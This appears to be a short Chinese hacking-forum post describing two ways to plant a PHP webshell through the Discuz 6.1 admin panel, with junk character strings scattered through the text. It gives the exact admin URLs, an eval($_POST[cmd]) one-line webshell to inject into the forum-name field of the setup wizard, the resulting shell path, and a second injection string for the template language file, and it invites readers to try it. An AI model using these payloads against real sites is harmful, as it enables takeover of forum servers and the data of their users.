discuz6.1两种方法后台拿shell- c& U! ^ P" A1 ?
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下: {) c4 r: R2 k- \, O) L) Z5 m/ [
1:
, D; p$ \) L% K, k/ [) O- dhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
( z; Y' k) q( n; n# M4 g* {0 \admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
3 A, n2 {/ P4 i<?php eval($_POST[cmd]);?>
. ]- {2 T8 U7 k3 g Z后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& r. _: L7 h' O3 Z O* e( g( s: P- c
. j* L# |; P0 a1 m$ S2:后台模板管理--默认模板套系--详情& U* c# I" V! y K
templates/default/actions.lang.php# W9 I3 j9 O8 W" l3 z8 [. D* K7 v. u8 ^6 e
jhackj\\');eval($_POST[cmd])?>;//" m0 ~9 O! ]) C7 a, u: Q
L2 }6 J0 M% Y& ?
利用很简单,聪明的人一看就懂了 |